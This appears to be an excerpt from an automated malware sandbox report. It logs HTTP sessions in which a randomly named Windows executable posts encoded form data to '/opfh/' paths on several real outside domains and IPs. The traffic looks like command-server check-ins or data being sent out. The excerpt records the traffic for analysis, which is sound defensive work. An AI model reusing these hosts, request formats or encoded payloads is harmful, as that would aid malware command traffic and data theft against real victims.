33 53 44 68 6a 45 7a 66 41 4f 4f 45 78 36 39 31 67 43 54 6c 4d 77 32 54 65 46 6c 4a 7a 43 4e 39 2b 4f 42 38 52 78 73 72 33 6e 33 4e 41 73 2b 79 71 64 4a 5a 69 2f 4b 33 39 4e 62 39 57 48 42 4b 41 49 49 70 34 49 38 52 48 30 68 4b 71 44 30 75 32 51 68 49 4f 64 5a 75 56 48 38 6c 56 45 73 53 39 47 4f 4e 6f 32 39 6d 4c 79 76 69 41 70 5a 61 33 2b 42 78 50 73 77 3d Data Ascii: R40L6=CASc69ff6fK/Ik6U8XfBMQB54FQAd+Z32poAJbXbSWNAxwvJE5amMi0Z0tHY/FQAFhEmYJbKkefMGOjMbyT23Fxv5+xJ/M+hMcUwHc+QE/Iz9ovp3SDhjEzfAOOEx691gCTlMw2TeFlJzCN9+OB8Rxsr3n3NAs+yqdJZi/K39Nb9WHBKAIIp4I8RH0hKqD0u2QhIOdZuVH8lVEsS9GONo29mLyviApZa3+BxPsw=
May 27, 2024 12:21:23.227595091 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:22 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: 04d78116-00e5-49f4-a3c6-083af8fc147b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug== set-cookie: parking_session=04d78116-00e5-49f4-a3c6-083af8fc147b; expires=Mon, 27 May 2024 10:36:23 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 51 2b 56 45 77 70 44 74 72 72 72 54 4a 72 7a 35 56 39 56 74 33 37 54 61 53 74 62 2b 76 68 61 2f 51 37 4e 66 32 32 46 38 6b 39 49 61 2b 7a 51 47 47 5a 76 71 74 4e 4f 48 35 44 48 71 6c 6a 47 50 79 63 79 73 79 51 63 77 43 33 5a 52 49 2b 64 32 37 4d 47 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:23.227615118 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDRkNzgxMTYtMDBlNS00OWY0LWEzYzYtMDgzYWY4ZmMxNDdiIiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	63180	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:26.909938097 CEST	1747	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.gamemaster.at Origin: http://www.gamemaster.at Referer: http://www.gamemaster.at/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 43 41 53 63 36 39 66 66 36 66 4b 2f 49 6b 36 55 38 58 66 42 4d 51 42 35 34 46 51 41 64 2b 5a 33 32 70 6f 41 4a 62 58 62 53 57 46 41 32 47 62 4a 48 59 61 6d 4e 69 30 5a 37 39 48 6a 2f 46 52 43 46 6c 6f 69 59 4a 57 6f 6b 59 62 4d 55 64 72 4d 4b 6d 50 32 35 46 78 76 37 2b 78 49 78 73 2b 4f 4d 63 45 73 48 63 75 51 45 2f 49 7a 39 71 33 70 2b 6a 44 68 68 45 7a 51 42 4f 4f 41 67 71 39 4a 67 43 72 54 4d 77 44 75 66 30 46 4a 32 53 64 39 79 63 5a 38 61 78 73 70 36 48 32 4f 41 73 79 54 71 64 56 2f 69 38 57 4e 39 4b 76 39 53 6a 34 69 58 72 56 31 38 4c 68 50 4b 33 52 56 67 43 6f 4f 73 68 6c 58 4d 50 5a 7a 66 56 41 68 4d 6e 59 4e 34 77 58 57 31 57 63 55 41 79 61 78 4c 4d 67 44 6a 76 46 58 52 49 7a 61 66 32 44 52 68 70 73 6c 71 46 4a 50 39 44 7a 72 4f 38 65 73 6b 4a 5a 54 6b 59 46 6a 68 6a 56 37 7a 67 67 6c 7a 34 79 70 79 58 77 2b 6c 6d 42 2f 4a 41 65 4f 2f 46 59 59 44 4b 33 32 42 6d 4f 4e 41 4c 70 6b 6b 48 54 4f 44 54 55 76 31 54 47 74 4c 4d 42 65 36 6d 4a 50 53 73 4e 75 49 38 76 68 65 4a 4e 73 [TRUNCATED] Data Ascii: R40L6=CASc69ff6fK/Ik6U8XfBMQB54FQAd+Z32poAJbXbSWFA2GbJHYamNi0Z79Hj/FRCFloiYJWokYbMUdrMKmP25Fxv7+xIxs+OMcEsHcuQE/Iz9q3p+jDhhEzQBOOAgq9JgCrTMwDuf0FJ2Sd9ycZ8axsp6H2OAsyTqdV/i8WN9Kv9Sj4iXrV18LhPK3RVgCoOshlXMPZzfVAhMnYN4wXW1WcUAyaxLMgDjvFXRIzaf2DRhpslqFJP9DzrO8eskJZTkYFjhjV7zgglz4ypyXw+lmB/JAeO/FYYDK32BmONALpkkHTODTUv1TGtLMBe6mJPSsNuI8vheJNsE5+Q8vmeXr0S82rgzou5Bqlc5yx4+qI7PgPKvLGIAwNaEiM35JNtccTLyE6f75gGCGS+D/EAoLZtAtroHQrZ60x7tbCLRlvx6H4/DlVwJ/Y6miqIxcZG6Ru98lkfqWCufY9+vP/urCU77A28aoKYegHGW0IIzeA5e4zgvcx3d7YJD0vrfGAvPfrqlAfiSfSQ0chzstWXiHvnvGg86HoQ27xu65UVnxcF2xCeRT25SFpIOfSvxGOt4kTRIIPD3OjBLEyC76IGfgl8dVSvA5+tEVoqYOfM0Ec+kbkmht0AjlpOUzl7i1QXrhB65UtIKB3RY/ww0uHYnnoluUPZ4qUygrtIp0+hM+psKXYGIaebdUcL87enEQUiXY1axTqEY8YpA2NlgZJqxDc6ghGHdwhtPgZdRUa/sevdFI+g6/vB3MXWUgvk/OPx9RbRv+x985EPH1/lMtCRKPgrmCFQjMrRLZ5xJW7qFUoDizdPsIpjnKy34XHONnp9acTgnj6OPDL3R0Nu3toEyOEeq+1/UFPha00Zht1M3QJHvpthS/K7FNTiuFkwrZMrj3tySCYtj/7W8PcGFnvtK0tyuXPp7LaMW98o2gXvcc9BrB00XN6TCbSAetx46EuHfx23nRBpPwRFz1Xu5dx9o599YTOcGOhtKWl7dWrDhsDKmy [TRUNCATED]
May 27, 2024 12:21:27.372297049 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:27 GMT content-type: text/html; charset=utf-8 content-length: 1118 x-request-id: aea96830-e529-4bb6-9a6f-3e0470078c06 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug== set-cookie: parking_session=aea96830-e529-4bb6-9a6f-3e0470078c06; expires=Mon, 27 May 2024 10:36:27 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 5a 51 2b 56 45 77 70 44 74 72 72 72 54 4a 72 7a 35 56 39 56 74 33 37 54 61 53 74 62 2b 76 68 61 2f 51 37 4e 66 32 32 46 38 6b 39 49 61 2b 7a 51 47 47 5a 76 71 74 4e 4f 48 35 44 48 71 6c 6a 47 50 79 63 79 73 79 51 63 77 43 33 5a 52 49 2b 64 32 37 4d 47 75 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ZQ+VEwpDtrrrTJrz5V9Vt37TaStb+vha/Q7Nf22F8k9Ia+zQGGZvqtNOH5DHqljGPycysyQcwC3ZRI+d27MGug==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:27.372328997 CEST	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWVhOTY4MzAtZTUyOS00YmI2LTlhNmYtM2UwNDcwMDc4YzA2IiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	63181	199.59.243.225	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:29.439800024 CEST	457	OUT	GET /opfh/?R40L6=PC685LTb06jHOCK4vGHbFQZ2xkI1XLFU2OtxALHCeHx3vCzda7v1dhtYxdz770kbIy0AX5udiNTwR8fzRWvU0kdzv6lB2tOiWMAiJN+HcPhB483U4R/s/Re5ANHairphm1/7Mj/vaUsb&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.gamemaster.at Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:21:29.915868998 CEST	1236	IN	HTTP/1.1 200 OK date: Mon, 27 May 2024 10:21:29 GMT content-type: text/html; charset=utf-8 content-length: 1526 x-request-id: c8d0e8c0-0daf-498a-bd93-6119f968ea0c cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uFM02yiPvNGH1xQMcjEplzxa93p7kFKT9aOmybtKDnGsv2XfLjPY+0De/YYU+0POgLesJOR0aw+/WNE+pUenvA== set-cookie: parking_session=c8d0e8c0-0daf-498a-bd93-6119f968ea0c; expires=Mon, 27 May 2024 10:36:29 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 75 46 4d 30 32 79 69 50 76 4e 47 48 31 78 51 4d 63 6a 45 70 6c 7a 78 61 39 33 70 37 6b 46 4b 54 39 61 4f 6d 79 62 74 4b 44 6e 47 73 76 32 58 66 4c 6a 50 59 2b 30 44 65 2f 59 59 55 2b 30 50 4f 67 4c 65 73 4a 4f 52 30 61 77 2b 2f 57 4e 45 2b 70 55 65 6e 76 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_uFM02yiPvNGH1xQMcjEplzxa93p7kFKT9aOmybtKDnGsv2XfLjPY+0De/YYU+0POgLesJOR0aw+/WNE+pUenvA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
May 27, 2024 12:21:29.915905952 CEST	979	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzhkMGU4YzAtMGRhZi00OThhLWJkOTMtNjExOWY5NjhlYTBjIiwicGFnZV90aW1lIjoxNzE2ODA1Mj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	63182	213.171.195.105	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:34.990835905 CEST	732	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.annahaywardva.co.uk Origin: http://www.annahaywardva.co.uk Referer: http://www.annahaywardva.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 6d 44 32 6f 36 35 44 39 55 62 56 45 67 6e 71 71 67 4d 34 36 42 79 47 45 50 79 4c 30 4d 6a 4e 74 2b 70 65 77 64 65 6f 30 45 67 51 4c 59 73 42 6a 4f 6b 49 53 32 47 4b 6f 78 53 58 32 7a 79 44 53 30 71 43 43 75 51 46 6f 46 66 4d 57 36 51 46 64 71 6d 58 6a 2f 35 54 6f 37 4f 38 37 4c 42 39 6f 30 4d 69 6d 76 38 4f 73 31 64 55 4f 51 6b 72 54 41 53 47 30 4c 35 55 4c 62 46 71 41 4b 71 6a 6c 4c 36 63 57 77 6a 37 71 69 37 74 57 51 53 6e 58 50 55 46 67 77 56 75 6c 73 36 61 4a 4b 2f 34 43 30 46 32 35 51 33 74 45 41 66 41 62 70 67 2b 37 44 38 79 2f 6c 33 4b 6c 46 48 49 41 62 71 75 5a 39 57 54 6d 6b 63 50 33 61 56 47 67 68 72 75 64 6e 77 3d 3d Data Ascii: R40L6=mD2o65D9UbVEgnqqgM46ByGEPyL0MjNt+pewdeo0EgQLYsBjOkIS2GKoxSX2zyDS0qCCuQFoFfMW6QFdqmXj/5To7O87LB9o0Mimv8Os1dUOQkrTASG0L5ULbFqAKqjlL6cWwj7qi7tWQSnXPUFgwVuls6aJK/4C0F25Q3tEAfAbpg+7D8y/l3KlFHIAbquZ9WTmkcP3aVGghrudnw==
May 27, 2024 12:21:35.601571083 CEST	309	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Mon, 27 May 2024 10:21:35 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	63183	213.171.195.105	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:37.817570925 CEST	752	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.annahaywardva.co.uk Origin: http://www.annahaywardva.co.uk Referer: http://www.annahaywardva.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 6d 44 32 6f 36 35 44 39 55 62 56 45 6d 47 61 71 73 4b 77 36 4b 79 47 46 53 43 4c 30 43 44 4e 70 2b 70 61 77 64 66 74 70 45 53 6b 4c 59 4d 52 6a 63 51 55 53 78 47 4b 6f 2b 79 58 33 39 53 44 5a 30 71 65 6b 75 52 70 6f 46 66 6f 57 36 55 4a 64 70 56 76 6b 35 35 54 6d 7a 75 38 71 57 52 39 6f 30 4d 69 6d 76 38 61 53 31 64 4d 4f 51 55 62 54 42 7a 47 31 44 5a 55 49 59 46 71 41 63 61 6a 68 4c 36 64 37 77 6d 54 4d 69 35 56 57 51 57 6a 58 50 67 52 76 37 56 76 75 69 61 62 6f 4d 76 4a 4b 35 46 36 78 4a 57 6c 72 65 38 77 62 6f 57 6a 5a 5a 65 2b 54 37 6d 79 65 42 46 73 32 4d 4d 7a 73 2f 58 58 2b 70 2b 37 57 46 69 6a 4b 73 35 50 5a 78 43 4a 65 69 42 57 69 6f 4c 2b 34 33 31 4e 48 59 65 2f 51 50 4b 41 3d Data Ascii: R40L6=mD2o65D9UbVEmGaqsKw6KyGFSCL0CDNp+pawdftpESkLYMRjcQUSxGKo+yX39SDZ0qekuRpoFfoW6UJdpVvk55Tmzu8qWR9o0Mimv8aS1dMOQUbTBzG1DZUIYFqAcajhL6d7wmTMi5VWQWjXPgRv7VvuiaboMvJK5F6xJWlre8wboWjZZe+T7myeBFs2MMzs/XX+p+7WFijKs5PZxCJeiBWioL+431NHYe/QPKA=
May 27, 2024 12:21:38.409436941 CEST	309	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.20.1 Date: Mon, 27 May 2024 10:21:38 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	63184	213.171.195.105	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:21:40.363502979 CEST	1765	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.annahaywardva.co.uk Origin: http://www.annahaywardva.co.uk Referer: http://www.annahaywardva.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 6d 44 32 6f 36 35 44 39 55 62 56 45 6d 47 61 71 73 4b 77 36 4b 79 47 46 53 43 4c 30 43 44 4e 70 2b 70 61 77 64 66 74 70 45 53 38 4c 59 2f 4a 6a 4e 42 55 53 77 47 4b 6f 33 53 58 79 39 53 44 2b 30 71 47 34 75 52 31 65 46 64 41 57 36 78 56 64 39 30 76 6b 71 5a 54 6d 78 75 38 36 4c 42 39 39 30 4d 79 69 76 38 4b 53 31 64 4d 4f 51 53 2f 54 43 69 47 31 46 5a 55 4c 62 46 72 42 4b 71 6a 46 4c 36 56 46 77 6d 58 36 69 49 31 57 58 79 48 58 4e 7a 35 76 79 56 76 73 6c 61 62 4b 4d 76 46 46 35 45 58 4b 4a 57 52 42 65 2f 67 62 6b 54 43 35 47 39 57 77 73 56 61 49 50 32 45 59 4f 75 6e 4b 36 6e 54 42 6b 75 79 7a 42 54 50 7a 74 36 50 45 6c 6c 30 6b 34 42 65 55 6e 5a 71 77 30 69 59 35 41 72 36 61 62 74 30 30 2f 4d 7a 41 66 39 52 41 55 71 6b 31 75 67 72 6f 58 54 46 47 43 4c 77 2f 33 70 58 38 35 6f 48 68 64 4a 76 6d 78 4d 35 59 49 44 39 51 4f 4f 75 56 73 64 4f 48 34 64 64 48 58 50 31 4f 68 74 75 79 65 41 67 63 2b 6f 78 4f 30 4c 38 5a 51 4e 30 52 49 76 35 4b 44 36 39 39 48 73 45 70 32 49 78 66 59 77 4a 67 [TRUNCATED] Data Ascii: R40L6=mD2o65D9UbVEmGaqsKw6KyGFSCL0CDNp+pawdftpES8LY/JjNBUSwGKo3SXy9SD+0qG4uR1eFdAW6xVd90vkqZTmxu86LB990Myiv8KS1dMOQS/TCiG1FZULbFrBKqjFL6VFwmX6iI1WXyHXNz5vyVvslabKMvFF5EXKJWRBe/gbkTC5G9WwsVaIP2EYOunK6nTBkuyzBTPzt6PEll0k4BeUnZqw0iY5Ar6abt00/MzAf9RAUqk1ugroXTFGCLw/3pX85oHhdJvmxM5YID9QOOuVsdOH4ddHXP1OhtuyeAgc+oxO0L8ZQN0RIv5KD699HsEp2IxfYwJgX/FnJF3k47GSbDshLxLaxzdyVbu/0mgd1/mOMEYqQY6pDdAvFvSiRwgh6H/v8IRSy9RZojkGTsp2arK1jqZz0qCELadB9n1GPqlRTbxvghmDi2XsCP3IAER5QpkL2ppIoa9Xz9uBRlTS1c+ph8TrSFs0sWzWpDa8Jxm7+ue9Do0NYQE781Zb/ohgAOF3GVxCBO8s2QuUlNQq33PWs6ABB91HfO3xjPfmw1JSHvkFgI+NmLPPgNBgd3NOZwmM6P8kiprIFa9rvXfU4At4Vz6OlnsC94V0r+qG/cwB1RcrhujtKDaaSiHIR7/2VZlgRRtIIp60nLsSMQsk1gl+gHs7MBAsZeuChUMazt8i3L27QxZKiRmiYy7OdvHl1IP0WDqH+HMLzNDT+1G1GaJNXn/QNIfmTtabBqGfkmu86JglEBDHYld/m8A1/2